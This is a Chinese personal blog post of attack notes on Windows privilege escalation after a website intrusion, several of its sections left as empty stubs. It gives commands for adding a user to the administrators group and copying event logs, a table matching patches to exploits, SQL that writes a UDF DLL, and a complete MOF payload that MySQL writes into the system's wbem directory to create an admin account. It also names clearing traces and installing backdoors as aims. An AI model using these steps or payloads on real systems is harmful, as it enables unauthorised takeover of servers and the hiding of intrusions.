<!DOCTYPE html>
<html lang="zh-Hans">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="N0rth3ty">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="N0rth3ty">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="每一顶白帽都有一道黑边">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>提权从入门到自闭 · N0rth3ty&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/img/a.jpg" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >N0rth3ty&#39;s Blog.</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">提权从入门到自闭</a>
            </div>
    </div>
    
    <a class="home-link" href=/>N0rth3ty's Blog.</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/img/02.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            提权从入门到自闭
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">1.4k</span>阅读时长: <span class="post-count reading-time">5 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/10/19</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>通过各种办法和漏洞，提高自己在服务器中的权限，以便控制全局。<br>Windows：<br>                 User    &gt;&gt;   System<br> Linux：<br>                User    &gt;&gt;   Root</p>
<p>提权攻击原理及提权方法<br>主要针对网站入侵过程中,当入侵某一网站时，通过各种漏洞提升<br>WEBSHELL权限，从而进一步获得服务器权限。<br><a id="more"></a></p>
<p>掌握相关的提权工具工具进行提权  </p>
<ul>
<li>操作系统本身的提权</li>
<li>利用数据库进行提权</li>
<li>系统配置不当提权</li>
<li>第三方软件提权</li>
</ul>
<p>提权后的操作</p>
<ul>
<li>清理痕迹–隐藏攻击</li>
<li>安装后门–长久控制</li>
<li>渗透内网-扩大战果<h2 id="0X00-Windows提权"><a href="#0X00-Windows提权" class="headerlink" title="0X00 Windows提权"></a>0X00 Windows提权</h2><h3 id="信息收集和提权基础"><a href="#信息收集和提权基础" class="headerlink" title="信息收集和提权基础"></a>信息收集和提权基础</h3>提权的第一步同样是信息收集<br>对于系统的基本信息一般包括</li>
<li>主机名</li>
<li>所属域</li>
<li>环境变量等</li>
</ul>
<p>以下是部分常用命令  </p>
<p>获取主机名  </p>
<blockquote>
<p><code>hostname</code>或者<code>echo %COMPUTERNAME%</code>  </p>
</blockquote>
<p>获取当前用户权限信息  </p>
<blockquote>
<p><code>whoami /priv</code>  </p>
</blockquote>
<p>收集本地用户和组信息<br>本地用户组  </p>
<blockquote>
<p><code>net localgroup</code></p>
</blockquote>
<p>本地用户  </p>
<blockquote>
<p><code>net user</code></p>
</blockquote>
<p>添加用户</p>
<blockquote>
<p><code>net user username password /add</code></p>
</blockquote>
<p>将用户加入管理组</p>
<blockquote>
<p><code>net localgroup administrators username /add</code></p>
</blockquote>
<p>激活guest用户  </p>
<blockquote>
<p><code>net user guest /active:yes</code>  </p>
</blockquote>
<p>修改用户密码  </p>
<blockquote>
<p><code>net user username newpassword</code></p>
</blockquote>
<p>本地管理员信息  </p>
<blockquote>
<p><code>net localgroup administrators</code>  </p>
</blockquote>
<p>获取所属域信息  </p>
<blockquote>
<p><code>systeminfo</code>  </p>
</blockquote>
<p>这个命令同时可以看到一些其它信息，包括补丁情况，系统版本等<br>而完整的补丁情况可以用</p>
<blockquote>
<p><code>wmic qfe list</code>  </p>
</blockquote>
<p>获取环境变量  </p>
<blockquote>
<p><code>set</code></p>
</blockquote>
<p>获取在线主机信息  </p>
<blockquote>
<p><code>net view</code>  </p>
</blockquote>
<p>获取本地共享信息，这里可能会有很多对我们提权有帮助的文件  </p>
<blockquote>
<p><code>net view /a \%COMPUTERNAME%</code></p>
</blockquote>
<p>获取IP信息，这个大概是进去的第一个命令  </p>
<blockquote>
<p><code>ipconfig /all</code>  </p>
</blockquote>
<p>查看本地端口开放与连接信息  </p>
<blockquote>
<p><code>netstat -ano</code></p>
</blockquote>
<p>查看进程列表</p>
<blockquote>
<p><code>tasklist /svc</code></p>
</blockquote>
<p>在安装了IIS服务的系统上，可以用一下命令获取站点信息  </p>
<blockquote>
<p><code>%windir%\system32\inetsrv\AppCmd.exe list site</code>  </p>
</blockquote>
<p>保存系统注册表信息  </p>
<blockquote>
<p><code>reg export HKLM hklm.reg</code><br><code>reg export HKCU hkcu.reg</code><br><code>reg export HKCU hkcr.reg</code><br><code>reg export HKCU hku.reg</code><br><code>reg export HKCU hkcc.reg</code>  </p>
</blockquote>
<p>获取系统日志信息  </p>
<blockquote>
<p><code>copy C:\Windows\System32\winevt\Logs\System.evtx</code><br><code>copy C:\Windows\System32\winevt\Logs\security.evtx</code><br><code>copy C:\Windows\System32\winevt\Logs\application.evtx</code>  </p>
</blockquote>
<p>其它一些提权常用命令  </p>
<p>获取在线用户  </p>
<blockquote>
<p><code>quser or query user</code></p>
</blockquote>
<p>获取rdp连接来源IP</p>
<blockquote>
<p><code>netstat -ano | findstr 3389</code></p>
</blockquote>
<p>分析安装杀软  </p>
<blockquote>
<p><code>dir c:\programdata\</code></p>
</blockquote>
<p>信息收集可以用一个bat脚本实现  </p>
<h3 id="提权分类"><a href="#提权分类" class="headerlink" title="提权分类"></a>提权分类</h3><h4 id="文件系统权限配置不当提权"><a href="#文件系统权限配置不当提权" class="headerlink" title="文件系统权限配置不当提权"></a>文件系统权限配置不当提权</h4><p>有时候webshell自带的cmd并不能执行，因为权限不够<br>但这个时候我们能够通过大马的探测功能探测可以读写的目录<br>然后上传一个cmd并运行<br>然后又可能遇到不能执行net相关命令的情况<br>同样可以上传一个net.exe进行调用，或者直接windows的API  </p>
<h4 id="远程溢出提权"><a href="#远程溢出提权" class="headerlink" title="远程溢出提权"></a>远程溢出提权</h4><p>以MS17010为例  </p>
<h4 id="本地系统漏洞提权"><a href="#本地系统漏洞提权" class="headerlink" title="本地系统漏洞提权"></a>本地系统漏洞提权</h4><p>常用的exp及其补丁对照</p>
<ul>
<li>KB2645640 MS12-009</li>
<li>KB2641653 MS12-018</li>
<li>KB952004   MS09-012 Pr.exe</li>
<li>KB956572   MS09-012 巴西烤肉</li>
<li>KB971657   MS09-041 </li>
<li>KB2620712 MS11-097</li>
<li>KB2393802 MS11-011 ms11011.exe</li>
<li>KB942831   MS08-005 </li>
<li>KB2503665 MS11-046 ms11046.exe</li>
<li>KB2592799 MS11-080 ms11080.exe</li>
</ul>
<p>较新的提权漏洞<br>可提权2008、2012、win7、win8、win10  </p>
<ul>
<li>MS12-020</li>
<li>MS13-046</li>
<li>MS13-053</li>
<li>MS14-058</li>
<li>MS15-051</li>
<li>MS15-077</li>
<li>MS15-097</li>
</ul>
<p>但是实际渗透中涉及的windows机器很多版本都较低  </p>
<p><a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank" rel="noopener">https://github.com/SecWiki/windows-kernel-exploits</a></p>
<p>可以利用msf进行漏洞扫描  </p>
<h4 id="基于数据库提权"><a href="#基于数据库提权" class="headerlink" title="基于数据库提权"></a>基于数据库提权</h4><h5 id="MSSQL"><a href="#MSSQL" class="headerlink" title="MSSQL"></a>MSSQL</h5><p>mssql提权遇到再补吧。。</p>
<h6 id="xp-cmdshell提权"><a href="#xp-cmdshell提权" class="headerlink" title="xp_cmdshell提权"></a>xp_cmdshell提权</h6><h6 id="sp-oacreate和sp-oamethod提权"><a href="#sp-oacreate和sp-oamethod提权" class="headerlink" title="sp_oacreate和sp_oamethod提权"></a>sp_oacreate和sp_oamethod提权</h6><h6 id="沙盒提权"><a href="#沙盒提权" class="headerlink" title="沙盒提权"></a>沙盒提权</h6><h6 id="JOB提权"><a href="#JOB提权" class="headerlink" title="JOB提权"></a>JOB提权</h6><h6 id="xp-regwrite函数进行映像劫持提权"><a href="#xp-regwrite函数进行映像劫持提权" class="headerlink" title="xp_regwrite函数进行映像劫持提权"></a>xp_regwrite函数进行映像劫持提权</h6><h5 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h5><h6 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h6><p>mysql提权必须要知道root账户的密码  </p>
<p>UDF提权时MySQL提权中最常用并且成功率最高的一种方法。UDF的全称是User Defined Function，意为用户自定义函数。  </p>
<ol>
<li>查看mysql版本<blockquote>
<p><code>select version()</code></p>
</blockquote>
</li>
<li>不同的版本导出udf.dll的路径不同，经验来讲直接导到<code>\lib\plugin</code>插件目录就可以了。<code>select @@plugin_dir</code>或者<code>show variables like &#39;%plugin%&#39;</code>可以查看插件目录  </li>
<li>上传dll文件到插件目录<br><code>select load_file(&#39;D:\\udf.dll&#39;) into
dumpfile &#39;E:\\mysql5\\5/lib\\plugin\\udf.dll&#39;</code><br>或者<br><code>select 0xUDFcode into dumpfile &#39;E:\\mysql5\\5/lib\\plugin\\udf.dll&#39;</code>也可以从webshell上传  </li>
</ol>
<p>udf手工提权先不写了，遇到再补。</p>
<h6 id="mof提权"><a href="#mof提权" class="headerlink" title="mof提权"></a>mof提权</h6><p>MOF(托管对象格式)是Windows系统的一个文件，其目录为<code>C:/windows/system32/wbem/mof/nullevt.mof</code>，其作用是每隔一段时间去监控进程的创建和死亡，MOF提权就是使用MySQL的Root权限将含有恶意代码的MOF文件上传到该目录下。</p>
<p>mof代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">#pragma namespace(&quot;\\\\.\\root\\subscription&quot;)   </span><br><span class="line">   instance of __EventFilter as $EventFilter</span><br><span class="line">   &#123;</span><br><span class="line">       EventNamespace = &quot;Root\\Cimv2&quot;;</span><br><span class="line">       Name  = &quot;filtP2&quot;;</span><br><span class="line">       Query = &quot;Select * From __InstanceModificationEvent &quot;</span><br><span class="line">               &quot;Where TargetInstance Isa \&quot;Win32_LocalTime\&quot; &quot;</span><br><span class="line">               &quot;And TargetInstance.Second = 5&quot;;</span><br><span class="line">       QueryLanguage = &quot;WQL&quot;;</span><br><span class="line">   &#125;;</span><br><span class="line">   instance of ActiveScriptEventConsumer as $Consumer</span><br><span class="line">   &#123;</span><br><span class="line">       Name = &quot;consPCSV2&quot;;</span><br><span class="line">       ScriptingEngine = &quot;JScript&quot;;</span><br><span class="line">       ScriptText =</span><br><span class="line">       &quot;var WSH = new ActiveXObject(\&quot;WScript.Shell\&quot;)\nWSH.run(\&quot;net.exe user admin admin /add\&quot;)&quot;;</span><br><span class="line">   &#125;;</span><br><span class="line">   instance of __FilterToConsumerBinding</span><br><span class="line">   &#123;</span><br><span class="line">       Consumer   = $Consumer;</span><br><span class="line">       Filter = $EventFilter;</span><br><span class="line">   &#125;;</span><br></pre></td></tr></table></figure></p>
<ol>
<li>上传mof文件</li>
<li><p>将MOF导出到C:/windows/system32/wbem/mof/目录，并重命名为nullevt.mof，其SQL语句为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select load_file(&apos;..../mof.txt&apos;) into dumpfile &apos;C:/windows/system32/wbem/mof/nullevt.mof&apos;;</span><br></pre></td></tr></table></figure>
</li>
<li><p>等待一段时间(s为单位，这里mof是5s)成功则发现已经添加admin账户，然后修改mof内容重新上传，将其加入到管理员用户组。  </p>
</li>
</ol>
<p>当没有上传权限时，可以直接用十六进制或者ascii通过sql直接写<br>进入系统后要删除mof文件，因为一直在写的原因，可能导致服务器宕机<br>该方法使用较老的机器  </p>
<h6 id="启动项提权"><a href="#启动项提权" class="headerlink" title="启动项提权"></a>启动项提权</h6><h4 id="第三方应用提权"><a href="#第三方应用提权" class="headerlink" title="第三方应用提权"></a>第三方应用提权</h4><ul>
<li>pcanywhere</li>
<li>RAdmin 存在于端口4899</li>
<li>IIS7 存在提权漏洞</li>
<li>….  </li>
</ul>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="http://yoursite.com">N0rth3ty</a>
            <p>原文链接：<a href="http://yoursite.com/2018/10/19/提权从入门到自闭/">http://yoursite.com/2018/10/19/提权从入门到自闭/</a>
            <p>发表日期：<a href="http://yoursite.com/2018/10/19/提权从入门到自闭/">October 19th 2018, 1:32:46 am</a>
            <p>更新日期：<a href="http://yoursite.com/2018/10/19/提权从入门到自闭/">October 25th 2018, 11:10:37 pm</a>
            <p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2018/10/21/渗透测试0x00-信息收集/" title= "渗透测试0x00 信息收集">
                    <div class="nextTitle">渗透测试0x00 信息收集</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2018/10/17/浅析SSTI/" title= "浅析SSTI">
                    <div class="prevTitle">浅析SSTI</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:northbhat@gmail.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/northity" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#提权"><span class="toc-number">1.</span> <span class="toc-text">提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X00-Windows提权"><span class="toc-number">2.</span> <span class="toc-text">0X00 Windows提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#信息收集和提权基础"><span class="toc-number">2.1.</span> <span class="toc-text">信息收集和提权基础</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#提权分类"><span class="toc-number">2.2.</span> <span class="toc-text">提权分类</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#文件系统权限配置不当提权"><span class="toc-number">2.2.1.</span> <span class="toc-text">文件系统权限配置不当提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#远程溢出提权"><span class="toc-number">2.2.2.</span> <span class="toc-text">远程溢出提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#本地系统漏洞提权"><span class="toc-number">2.2.3.</span> <span class="toc-text">本地系统漏洞提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#基于数据库提权"><span class="toc-number">2.2.4.</span> <span class="toc-text">基于数据库提权</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#MSSQL"><span class="toc-number">2.2.4.1.</span> <span class="toc-text">MSSQL</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#xp-cmdshell提权"><span class="toc-number">2.2.4.1.1.</span> <span class="toc-text">xp_cmdshell提权</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#sp-oacreate和sp-oamethod提权"><span class="toc-number">2.2.4.1.2.</span> <span class="toc-text">sp_oacreate和sp_oamethod提权</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#沙盒提权"><span class="toc-number">2.2.4.1.3.</span> <span class="toc-text">沙盒提权</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#JOB提权"><span class="toc-number">2.2.4.1.4.</span> <span class="toc-text">JOB提权</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#xp-regwrite函数进行映像劫持提权"><span class="toc-number">2.2.4.1.5.</span> <span class="toc-text">xp_regwrite函数进行映像劫持提权</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#MYSQL"><span class="toc-number">2.2.4.2.</span> <span class="toc-text">MYSQL</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#UDF提权"><span class="toc-number">2.2.4.2.1.</span> <span class="toc-text">UDF提权</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#mof提权"><span class="toc-number">2.2.4.2.2.</span> <span class="toc-text">mof提权</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#启动项提权"><span class="toc-number">2.2.4.2.3.</span> <span class="toc-text">启动项提权</span></a></li></ol></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#第三方应用提权"><span class="toc-number">2.2.5.</span> <span class="toc-text">第三方应用提权</span></a></li></ol></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
